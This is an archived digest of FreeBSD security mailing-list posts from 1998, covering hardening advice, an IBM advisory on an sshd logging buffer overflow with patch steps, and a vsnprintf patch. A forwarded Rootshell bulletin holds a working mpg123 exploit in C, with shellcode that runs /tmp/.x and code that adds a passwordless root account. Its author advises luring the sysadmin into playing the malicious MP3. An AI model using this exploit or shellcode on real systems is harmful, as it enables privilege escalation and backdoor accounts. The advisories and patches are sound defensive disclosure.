From owner-freebsd-security Sun Nov 1 01:01:17 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA00997 for freebsd-security-outgoing; Sun, 1 Nov 1998 01:01:17 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from witch.xtra.co.nz (witch.xtra.co.nz [202.27.184.8]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA00991 for ; Sun, 1 Nov 1998 01:01:15 -0800 (PST) (envelope-from junkmale@pop3.xtra.co.nz) Received: from wocker (210-55-210-87.ipnets.xtra.co.nz [210.55.210.87]) by witch.xtra.co.nz (8.9.1/8.9.1) with SMTP id WAA12524 for ; Sun, 1 Nov 1998 22:01:01 +1300 (NZDT) Message-Id: <199811010901.WAA12524@witch.xtra.co.nz> From: "Dan Langille" Organization: DVL Software Limited To: security@FreeBSD.ORG Date: Sun, 1 Nov 1998 22:01:10 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: no telnet. how secure? Reply-to: junkmale@xtra.co.nz X-mailer: Pegasus Mail for Win32 (v3.01b) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't allow telnet to my box. I'm the only user. I'm running a webserver, but it's not published. There's no CGI apart from what came with Apache. How vulnerable is such a machine to attack? I would like to exclude DOS attacks from this discussion as I feel thats something outside the scope of this question. -- Dan Langille The FreeBSD Diary - my [mis]adventures http://www.FreeBSDDiary.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 03:02:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA13928 for freebsd-security-outgoing; Sun, 1 Nov 1998 03:02:39 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA13883 for ; Sun, 1 Nov 1998 03:02:22 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199811011102.DAA13883@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA256838131; Sun, 1 Nov 1998 22:02:11 +1100 From: Darren Reed Subject: Re: IPFW problems... To: junkmale@xtra.co.nz Date: Sun, 1 Nov 1998 22:02:10 +1100 (EDT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199810291803.HAA15509@witch.xtra.co.nz> from "Dan Langille" at Oct 30, 98 07:03:17 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Dan Langille, sie said: > > On 29 Oct 98, at 21:45, Darren Reed wrote: > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version may > > not yet work. > > OK. Good! Can you guess when the other version will work? My testing shows "traceroute -I" to work properly with NAT. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 03:42:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA21188 for freebsd-security-outgoing; Sun, 1 Nov 1998 03:42:39 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA21171 for ; Sun, 1 Nov 1998 03:42:32 -0800 (PST) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1a/8.9.1) id WAA01629; Sun, 1 Nov 1998 22:42:20 +1100 (EST) Date: Sun, 1 Nov 1998 22:42:20 +1100 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: Dan Langille cc: security@FreeBSD.ORG Subject: Re: no telnet. how secure? In-Reply-To: <199811010901.WAA12524@witch.xtra.co.nz> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Nov 1998, Dan Langille wrote: : I don't allow telnet to my box. I'm the only user. I'm running a : webserver, but it's not published. There's no CGI apart from what came : with Apache. How vulnerable is such a machine to attack? I would like to : exclude DOS attacks from this discussion as I feel thats something outside : the scope of this question. As listmembers, we can only really suggest common sense solutions without further information of your network and system setup. But here's my $0.02 worth of advice nevertheless. :) - Don't run services you don't need to run. Edit inetd.conf and rc.conf accordingly. - Compile firewall support into your kernel, or make use of the ipfw loadable kernel module. Learn how to use it effectively. - Learn what files on your system are priviledged (suid/sgid). Then, go through them one by one, and decide whether they *really* need to be priviledged. Robert Watson's tool 'suidcontrol' is well suited to this task: http://www.watson.org/fbsd-hardening/suidcontrol.html - Check recent CERT advisories and FreeBSD Security Advisories, and determine whether your system needs patching/etc. If so, apply them. - Keep abreast of the latest security developments and vulnerability's. Subscribing to mailing lists such as this one and BUGTRAQ is a good start. - If you have users, set appropriate defaults in such files as /etc/profile for umask and other settings that affect security. Url's you should check on a semi-regular basis: - http://www.freebsd.org/security/ FreeBSD's Security Site - http://www.watson.org/fbsd-hardening/ FreeBSD Hardening Project - http://www.best.com/~jkb/howto.txt FreeBSD Security Howto : -- : Dan Langille : The FreeBSD Diary - my [mis]adventures : http://www.FreeBSDDiary.com Hope that's of help, Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 14:56:11 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA20655 for freebsd-security-outgoing; Sun, 1 Nov 1998 14:56:11 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from bow.net (bow.net [204.216.183.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA20644 for ; Sun, 1 Nov 1998 14:56:10 -0800 (PST) (envelope-from bow@bow.net) Received: (from bow@localhost) by bow.net (8.9.1/8.9.1) id OAA29528 for FreeBSD-security@FreeBSD.ORG; Sun, 1 Nov 1998 14:54:57 -0800 (PST) From: bow Message-Id: <199811012254.OAA29528@bow.net> Subject: [rootshell] Security Bulletin #25 (fwd) To: FreeBSD-security@FreeBSD.ORG Date: Sun, 1 Nov 1998 14:54:57 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Forwarded message from announce-outgoing@rootshell.com ----- >From root@proxy-sd-1.connectnet.com Sun Nov 1 12:54:52 1998 Delivered-To: announce-outgoing@newsletter.connectnet.com Date: 1 Nov 1998 20:43:19 -0000 Message-ID: <19981101204319.1992.qmail@proxy-sd-1.connectnet.com> Cc: recipient list not shown: ; From: announce-outgoing@rootshell.com X-Mailer: Rootshell 1.0 Subject: [rootshell] Security Bulletin #25 www.rootshell.com Security Bulletin #25 November 1st, 1998 [ http://www.rootshell.com/ ] ---------------------------------------------------------------------- To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com with "unsubscribe announce" in the BODY of the message. Send submissions to info@rootshell.com. Messages sent will not be sent to other members on this list unless it is featured in a security bulletin. An archive of this list is available at : http://www.rootshell.com/mailinglist-archive ---------------------------------------------------------------------- Contents -------- 01. ssh 1.2.26 vulnerability 02. mpg123-0.59k buffer overflow with exploit 01. ssh 1.2.26 vulnerability ---------------------------- As most of you are aware, the Rootshell site was compromised on October 28th. In order to keep the integrity of our investigation we have been fairly closed-lipped about this incident until now. This has led to widespread rumors and speculation by netizens who have zero first hand knowledge about the break-in. Some people now believe that we had no evidence of an ssh break-in. SSH Communications Security Ltd. even went as far as saying they have analyzed the Rootshell logs, etc. Unless they have broken into our network this is not possible. We at Rootshell believe they are now simply in damage control mode and nothing else. Since the very beginning, Rootshell has been working very closely with the folks at CERT, and the members of law enforcement to track down the individuals responsible for the Rootshell break-in. As the ssh issue has been a very sensitive topic we have avoided making any statements until we were sure about anything one way or the other. The *ONLY* thing Rootshell has ever said in public about SSH until now has been "The paranoid MAY want to disable ssh 1.2.26." In order to show the type of evidence Rootshell has received at this point, below you will find a draft that IBM was intending to release on Monday about SSH. They appear to have jumped the gun slightly and do not have working exploit code, but have found possible buffer overflows in the ssh 1.2.26 code. Rootshell has also received further reports of exploit code going around in various circles. SSH Communications Security Ltd. has evaluated this bulletin and now believes it is actually not a problem. Rootshell will continue its investigation of this matter as well as other security issues and will make this information public as soon as possible. I hope that this bulletin will at the very least put an end to the wild speculation that this was a hoax, or that we are just in the business of making wild accusations. Please see http://www.ssh.fi/sshprotocols2/rootshell.html for their "analysis" of events. It is sad that we had to learn of this URL from Slashdot.org instead of SSH directly. They appear to have some serious communications dificuilties. Both Rootshell and CERT were met with unanswered phones at SSH Communications Security Ltd. and Data Fellows when we attempted to research this matter. Perhaps after this incident they can work on correcting these issues. SSH is a trademark of SSH Communications Security Ltd. All rights reserved. [ end rant ] --ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT-- ---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE--- ======= ============ ====== ====== ======= ============== ======= ======= === === ==== ====== ====== === =========== ======= ======= === =========== === ======= === === === ==== === ===== === ======= ============== ===== === ===== ======= ============ ===== = ===== EMERGENCY RESPONSE SERVICE SECURITY VULNERABILITY ALERT 30 October 1998 18:00 GMT Number: ERS-SVA-E01-1998:005.1 =============================================================================== VULNERABILITY SUMMARY VULNERABILITY: Buffer overflow condition in "sshd" logging facility PLATFORMS: Versions of SSH up to and including SSH 1.2.26. SSH 2.0.x is *not* believed to be vulnerable. SOLUTION: Follow the procedures described in Section IV, below THREAT: Local and remote users can obtain privileged access to the system. =============================================================================== DETAILED INFORMATION I. Description SSH (Secure Shell) is software that allows users to log into other computers over a network, execute commands on remote systems, and move files from one host to another. It provides strong authentication and secure (encrypted) communications over insecure channels. SSH is produced by SSH Communications Security, Ltd., Finland (www.ssh.fi). SSH is distributed for non-commercial use from ftp://ftp.cs.hut.fi/pub/ssh; commercial licensing is handled by Data Fellows, Ltd. (www.datafellows.com). The IBM Global Security Analysis Laboratory has identified a buffer overflow vulnerability in the SSH server program, "sshd." The "log_msg" function, called by several parts of the server program to send information to the system log, copies user-supplied data into a local buffer without checking that the data will fit. Several other similar logging, debug, and error functions perform this operation as well. When a large amount of data is supplied, a buffer overrun condition will occur. II. Impact If a user is able to exploit this vulnerability to create a buffer overrun, it may be possible for the user to supply machine-language program instructions that will then be executed with the privileges of the user running the "sshd" program, usually the super-user. This vulnerability can be exploited by local and remote users. The person exploiting the vulnerability does not need to have an account on the machine running "sshd" to succeed. III. Platform-Specific Threats This vulnerability affects recent (and perhaps older) 1.2.x versions of the "sshd" server. The current 1.2.x version of the server is 1.2.26. It is believed that the 2.0.x versions of the "sshd" server do not contain this vulnerability. The current 2.0.x version of the server is 2.0.9. IV. Solutions IBM-ERS has provided the information it has developed about this vulnerability to SSH Communications Security, Ltd, and anticipates that a new versions of SSH 1.2.x that fixes this vulnerability will be available soon. When this new version becomes available, IBM-ERS urges all sites to upgrade their SSH servers to the new release as quickly as possible. In the meantime, however, IBM-ERS and the IBM GSAL have developed the three following specific actions that you can take to address this vulnerability. Option 1: Operate the "sshd" program with the "-q" option turned on. Note that this will disable the logging functions normally performed. This may be undesirable in some situations. Option 2: If possible, upgrade to version 2.0.x of SSH. This version supports a newer, more capable version of the SSH protocol and offers additional features. Option 3: Follow the procedure below to patch the SSH 1.2.26 source code to address this vulnerability in a manner similar to the way the SSH 2.0.x source code addresses it. NOTE: This procedure should only be attempted by persons familiar with installing the SSH software from source code. 1. Obtain the source code distributions for SSH 1.2.26 and SSH 2.0.9 from ftp://ftp.cs.hut.fi/pub/ssh or Data Fellows, Ltd. Be sure to observe all licensing requirements. 2. Copy the following files lib/sshutil/snprintf.h lib/sshutil/snprintf.c from the SSH 2.0.9 directory to the SSH 1.2.26 directory (put them at the top level, do not reproduce the subdirectories). 3. Edit "Makefile.in" in the SSH 1.2.26 directory and add the word "snprintf.o" to the "COMMON_OBJS" and "SCP_OBJS" definitions. Also add the word "snprintf.h" to the "HEADERS" definition. 4. Edit the files "log-server.c," "packet.c," and "scp.c" in the SSH 1.2.26 directory and do the following: a. Add the line #include "snprintf.h" near the top of each file with the rest of the "#include" lines. b. Locate all occurrences of vsprintf(buf, fmt, args); in each file and replace them with vsnprintf(buf, sizeof(buf), fmt, args); There are six (6) occurrences in "log-server.c," two (2) in "packet.c," and one (1) in "scp.c". 5. Edit "snprintf.h" and change the line #include "sshincludes.h" to read #include "includes.h" Also delete the two occurrences of the word "DLLEXPORT." 6. Edit "snprintf.c" and change the line #include "sshincludes.h" to read #include "includes.h" Also replace the one occurrence of "ssh_xmalloc" with "xmalloc", and the two occurrences of "ssh_xfree" with "xfree". 7. Read the instructions in the "INSTALL" file in the SSH 1.2.26 directory to build and install the modifications made above. IBM-ERS and IBM GSAL have carefully examined the SSH 1.2.26 source code, and tested these steps on a production "sshd" server. No ill effects have been observed. However, because it is impossible to anticipate all possible environments in which SSH is used, the following disclaimer applies to the procedures above: THESE PROCEDURES ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, INCLUDING, WITHOUT LIMITATION, ANY IMPLIED WARRANTIES OF MERCHANTIBILITY OR FITNESS FOR A PARTICULAR PURPOSE. THIS ADVISORY DOES NOT CREATE OR IMPLY ANY SUPPORT OBLIGATIONS OR ANY OTHER LIABILITY ON THE PART OF IBM OR ITS SUBSIDIARIES. V. Acknowledgements IBM-ERS would like to thank Alan and Art at the IBM Global Security Analysis Laboratory for their work in identifying this problem. SSH and Secure Shell are trademarks or registered trademarks of SSH Communications Security Ltd. =============================================================================== IBM's Internet Emergency Response Service (IBM-ERS) is a subscription-based Internet security response service that includes computer security incident response and management, regular electronic verification of your Internet gateway(s), and security vulnerability alerts similar to this one that are tailored to your specific computing environment. By acting as an extension of your own internal security staff, IBM-ERS's team of Internet security experts helps you quickly detect and respond to attacks and exposures across your Internet connection(s). As a part of IBM's Business Recovery Services organization, the IBM Internet Emergency Response Service is a component of IBM's SecureWay(tm) line of security products and services. From hardware to software to consulting, SecureWay solutions can give you the assurance and expertise you need to protect your valuable business resources. To find out more about the IBM Internet Emergency Response Service, send an electronic mail message to ers-sales@vnet.ibm.com, or call 1-800-742-2493 (Prompt 4). IBM-ERS maintains a site on the World Wide Web at http://www.ers.ibm.com/. Visit the site for information about the service, copies of security alerts, team contact information, and other items. IBM-ERS uses Pretty Good Privacy* (PGP*) as the digital signature mechanism for security vulnerability alerts and other distributed information. The IBM-ERS PGP* public key is available from http://www.ers.ibm.com/team-info/pgpkey.html. "Pretty Good Privacy" and "PGP" are trademarks of Philip Zimmermann. IBM-ERS is a Member Team of the Forum of Incident Response and Security Teams (FIRST), a global organization established to foster cooperation and response coordination among computer security teams worldwide. Copyright 1998 International Business Machines Corporation. The information in this document is provided as a service to customers of the IBM Emergency Response Service. Neither International Business Machines Corporation, nor any of its employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, complete- ness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by IBM or its subsidiaries. The views and opinions of authors expressed herein do not necessarily state or reflect those of IBM or its subsidiaries, and may not be used for advertising or product endorsement purposes. The material in this security alert may be reproduced and distributed, without permission, in whole or in part, by other security incident response teams (both commercial and non-commercial), provided the above copyright is kept intact and due credit is given to IBM-ERS. This security alert may be reproduced and distributed, without permission, in its entirety only, by any person provided such reproduction and/or distribution is performed for non-commercial purposes and with the intent of increasing the awareness of the Internet community. ---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE--- --ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT-- 02. mpg123-0.59k buffer overflow with exploit --------------------------------------------- >From na98jen@student.hig.se Sun Nov 1 12:31:44 1998 Date: Sun, 1 Nov 1998 12:56:37 +0100 (MET) From: Joel Eriksson To: submission@rootshell.com Subject: mpg123-0.59k bufferoverflow. More info in my Bugtraq-posting... Here I'll just include the stuff for the sCr1p+-k1dD13z. This will create a 56 bytes MP3 that executes /tmp/.x which could for example be a program that checks the UID and if run by root creates a new account / SUID-shell / installs backdoors / whatever, and if run by a user adds entries to their .rhosts or something.. I have included a 93 bytes buffer with machinecode to create a new root-account on the system which I planned to read in and jmp to with the 48 bytes we can use in the overflow. Have not had the time to fix some problems with this method though, so you'll have to satisfy with this if you don't want to code it yourself. For those who haven't figured that out yet you'll have to get someone to try to listen to the damn thing too. :-) (I say this in the comments to the src to, but noone seems to read those damn comments anyway so..) You could for example mail the file to other users / the sysadmin, or just have it in /tmp or your homedir and wait 'til someone gets curious.. --- mp3exp.c START [cut here] /* ** Exploit for mpg123-0.59k, Linux x86. ** --- calcaddr.sh START #!/bin/sh perl -e 'print "RIFF" . "A"x56'>bof.mp3 mpg123 bof.mp3 2> /dev/null echo info all-registers \ |gdb mpg123 core 2>/dev/null|egrep "^esp"|awk '{print $2}' rm -f bof.mp3 --- calcaddr.sh END ** ** Give the address shown by calcaddr.sh as the first argument to ** this exploit, and it will handle the rest.. (e.g. subtract 0x4C ** from the address given) OBS! If you do what the script does manually ** you will not get the same result. Then CALCOFFSET should be 0x34 instead. ** ** mpg123-0.59o is not vulnerable, previous versions not checked. ** ** DESCRIPTION: ** ** Makes an MP3-file that executes a program when played with mpg123-0.59k. ** Will be more useful when I have succeded in making it add an account, ** the problem is that we only have 48 bytes to work with and my code ** to add a new account takes 93 bytes. ** ** For those who have not understood that yet, the trick is too get ** *someone*else* to play the MP3 using mpg123. You could for example ** mail the file to the sysadmin or just have it in /tmp and name it ** something like k3w1-mUz4c.MP3 or whatever may seem appropriate. :-) ** ** Plan: In the 48 bytes I can put my code I'll make a routine that ** just allocates a buffer, reads in the 93 bytes required to add ** an account and jmp's to the beginning of the code. ** ** (C) 1998/10/31, Joel Eriksson - Chaoz on IRCNet. ** ** Disclaimer: This program is for informational purposes only. ** I can not be held responsible for any use or misuse ** of this program. And so on, the usual stuff.. */ #include #include #include #include #include #include #include #define ADDRLEN 4 #define DEFAULT_OFFSET -0x88; #define CALCOFFSET -0x4C /* ** When the address is calculated in a subshell (e.g. using the script ** included with this sourcecode) the offset is -0x4C, but when it is ** calculated manually in the lowest shell-level the offset is -0x34. */ #define MP3NAME "bof.mp3" const char FILLCHAR = '.'; /* ** Standard shellcode, made by Aleph One, published in Phrack #49 ** Modified to execute /tmp/.x instead of /bin/sh. ** ** /tmp/.x could for example add an account, create a SUID-root shell ** or if run by an ordinary user add an entry to their .rhosts, create ** a SUID-user shell or something else that seems like a good idea. */ char shellcode[] = "\xeb\x1f" // jmp 0x1f "\x5e" // popl %esi "\x89\x76\x08" // movl %esi,0x8(%esi) "\x31\xc0" // xorl %eax,%eax "\x88\x46\x07" // movb %al,0x7(%esi) "\x89\x46\x0c" // movl %eax,0xc(%esi) "\xb0\x0b" // movb $0xb,%al "\x89\xf3" // movl %esi,%ebx "\x8d\x4e\x08" // leal 0x8(%esi),%ecx "\x8d\x56\x0c" // leal 0xc(%esi),%edx "\xcd\x80" // int $0x80 "\x31\xdb" // xorl %ebx,%ebx "\x89\xd8" // movl %ebx,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 "\xe8\xdc\xff\xff\xff" // call -0x24 "/tmp/.x"; // .string "/bin/sh" // 46 bytes /* ** To execute something else than /tmp/.x just change the last string, ** but remember that it must be a 7 bytes string. It's possible to ** change the shellcode to execute a command with a longer path than ** 7 bytes by changing the offsets from %esi, which is not too hard ** if you know some assembler. */ /* ** Code to add user to passwd-file, made by me. Not used in this ** particular exploit yet, but ideally it'd be read in and executed ** by the 48 bytes that I have used to execute a shell in this exploit. ** This way the exploit becomes more interesting since it can be exploited ** remotely. We need to do some stackprediction though.. ** ** If someone makes an exploit that uses this code, make sure to include ** me in the greetings. */ char addusercode[] = "\xeb\x3d" // jmp 0x3d "\x5e" // popl %esi "\x89\x76\x1a" // movl %esi,0x1a(%esi) "\x31\xc0" // xorl %eax,%eax "\x88\x46\x0b" // movb %al,0x0b(%esi) "\x83\xc6\x0c" // addl $0x0c,%esi "\x89\x76\x12" // movl %esi,0x12(%esi) "\x83\xee\x0c" // subl $0x0c,%esi "\x31\xc0" // xorl %eax,%eax "\x88\x46\x19" // movb %al,0x19(%esi) "\x8b\x5e\x1a" // movl 0x1a(%esi),%ebx "\x31\xc9" // xorl %ecx,%ecx "\xb5\x04" // movb $0x4,%ch "\xb1\x01" // movb $0x1,%cl "\x31\xc0" // xorl %eax,%eax "\xb0\x05" // movb $0x5,%al "\xcd\x80" // int $0x80 "\x89\xc3" // movl %eax,%ebx "\x8b\x4e\x1e" // movl 0x1e(%esi),%ecx "\x31\xd2" // xorl %edx,%edx "\xb2\x0d" // movb $13,%edx "\x31\xc0" // xorl %eax,%eax "\xb0\x04" // movb $0x4,%al "\xcd\x80" // int $0x80 "\x31\xdb" // xorl %ebx,%ebx "\x31\xc0" // xorl %eax,%eax "\xb0\x01" // movb $0x1,%al "\xcd\x80" // int $0x80 "\xe8\xbe\xff\xff\xff" // call -0x46 "/etc/passwd." // .string "/etc/passwd" "r00t::0:0:::\x0a"; // .string "r00t::0:0:::\n" // 93 bytes unsigned long getsp() { __asm("mov %esp, %eax"); } int main(int argc, char **argv) { unsigned long addr; char *addr_ptr = (char*)&addr; int fd, i; char *filename = MP3NAME; addr = getsp() + DEFAULT_OFFSET; if(argc > 1) { /* ** This is UGLY coding. :-) strtol() overflows for some reason ** when just doing one strtol() on argv[1]. */ char *strptr = argv[1]; char *numptr; char cur[3]; char temp; int i; memset(addr_ptr, 0, ADDRLEN); memset(cur, 0, 3); if(!strncmp(strptr, "0x", 2)) strptr += 2; for(i=0; i 2) filename = argv[2]; if(argc > 3) { fprintf(stderr, "Usage: %s [
] []\n", argv[0]); exit(1); } if((fd = open(filename, O_WRONLY|O_CREAT|O_EXCL, 0644)) == -1) { perror("open"); fprintf(stderr, "Could not create %s\n", filename); exit(1); } printf("Using address: 0x%lx\n", addr); write(fd, "RIFF", 4); write(fd, shellcode, strlen(shellcode)); for(i=0; i<48-strlen(shellcode); i++) write(fd, &FILLCHAR, 1); for(i=0; i<4; i++) write(fd, &addr_ptr[i], 1); printf("\nMP3 created in %s.\n", filename); exit(0); } -- mp3exp.c END [cut here] ---------------------------------------------------------------------- To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com with "unsubscribe announce" in the BODY of the message. Send submissions to info@rootshell.com. Messages sent will not be sent to other members on this list unless it is featured in a security bulletin. An archive of this list is available at : http://www.rootshell.com/mailinglist-archive ---------------------------------------------------------------------- ----- End of forwarded message from announce-outgoing@rootshell.com ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 15:42:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA26656 for freebsd-security-outgoing; Sun, 1 Nov 1998 15:42:18 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA26651 for ; Sun, 1 Nov 1998 15:42:17 -0800 (PST) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id SAA10824 for ; Sun, 1 Nov 1998 18:42:14 -0500 (EST) Date: Sun, 1 Nov 1998 18:42:13 -0500 (EST) From: "Matthew N. Dodd" To: freebsd-security@FreeBSD.ORG Subject: SSH vsprintf patch. (You've been warned Mr. Glass) Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-283913581-909963733=:17054" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-283913581-909963733=:17054 Content-Type: TEXT/PLAIN; charset=US-ASCII Look for details on this tomorrow but here is a patch that addresses the vsprintf calls in ssh 1.2.26. --- log-server.c.orig Sun Nov 1 18:21:57 1998 +++ log-server.c Sun Nov 1 18:20:39 1998 @@ -134,7 +134,7 @@ if (log_quiet) return; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "log: %s\n", buf); @@ -175,7 +175,7 @@ if (log_quiet) return; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "log: %s\n", buf); @@ -191,7 +191,7 @@ if (!log_debug || log_quiet) return; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "debug: %s\n", buf); @@ -207,7 +207,7 @@ if (log_quiet) return; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "error: %s\n", buf); @@ -302,7 +302,7 @@ if (log_quiet) exit(1); va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "fatal: %s\n", buf); @@ -321,7 +321,7 @@ if (log_quiet) exit(1); va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "fatal: %s\n", buf); --- packet.c.orig Sun Nov 1 18:16:33 1998 +++ packet.c Sun Nov 1 18:25:11 1998 @@ -693,7 +693,7 @@ va_list args; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); packet_start(SSH_MSG_DEBUG); @@ -719,7 +719,7 @@ /* Format the message. Note that the caller must make sure the message is of limited size. */ va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); /* Send the disconnect message to the other side, and wait for it to get --- scp.c.orig Sun Nov 1 18:16:41 1998 +++ scp.c Sun Nov 1 18:25:56 1998 @@ -332,7 +332,7 @@ char buf[1024]; va_start(ap, fmt); - vsprintf(buf, fmt, ap); + vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); fprintf(stderr, "%s\n", buf); exit(255); -- | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | --0-283913581-909963733=:17054 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="vsprintf.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="vsprintf.patch" LS0tIGxvZy1zZXJ2ZXIuYy5vcmlnCVN1biBOb3YgIDEgMTg6MjE6NTcgMTk5 OA0KKysrIGxvZy1zZXJ2ZXIuYwlTdW4gTm92ICAxIDE4OjIwOjM5IDE5OTgN CkBAIC0xMzQsNyArMTM0LDcgQEANCiAgIGlmIChsb2dfcXVpZXQpDQogICAg IHJldHVybjsNCiAgIHZhX3N0YXJ0KGFyZ3MsIGZtdCk7DQotICB2c3ByaW50 ZihidWYsIGZtdCwgYXJncyk7DQorICB2c25wcmludGYoYnVmLCBzaXplb2Yo YnVmKSwgZm10LCBhcmdzKTsNCiAgIHZhX2VuZChhcmdzKTsNCiAgIGlmIChs b2dfb25fc3RkZXJyKQ0KICAgICBmcHJpbnRmKHN0ZGVyciwgImxvZzogJXNc biIsIGJ1Zik7DQpAQCAtMTc1LDcgKzE3NSw3IEBADQogICBpZiAobG9nX3F1 aWV0KQ0KICAgICByZXR1cm47DQogICB2YV9zdGFydChhcmdzLCBmbXQpOw0K LSAgdnNwcmludGYoYnVmLCBmbXQsIGFyZ3MpOw0KKyAgdnNucHJpbnRmKGJ1 Ziwgc2l6ZW9mKGJ1ZiksIGZtdCwgYXJncyk7DQogICB2YV9lbmQoYXJncyk7 DQogICBpZiAobG9nX29uX3N0ZGVycikNCiAgICAgZnByaW50ZihzdGRlcnIs ICJsb2c6ICVzXG4iLCBidWYpOw0KQEAgLTE5MSw3ICsxOTEsNyBAQA0KICAg aWYgKCFsb2dfZGVidWcgfHwgbG9nX3F1aWV0KQ0KICAgICByZXR1cm47DQog ICB2YV9zdGFydChhcmdzLCBmbXQpOw0KLSAgdnNwcmludGYoYnVmLCBmbXQs IGFyZ3MpOw0KKyAgdnNucHJpbnRmKGJ1Ziwgc2l6ZW9mKGJ1ZiksIGZtdCwg YXJncyk7DQogICB2YV9lbmQoYXJncyk7DQogICBpZiAobG9nX29uX3N0ZGVy 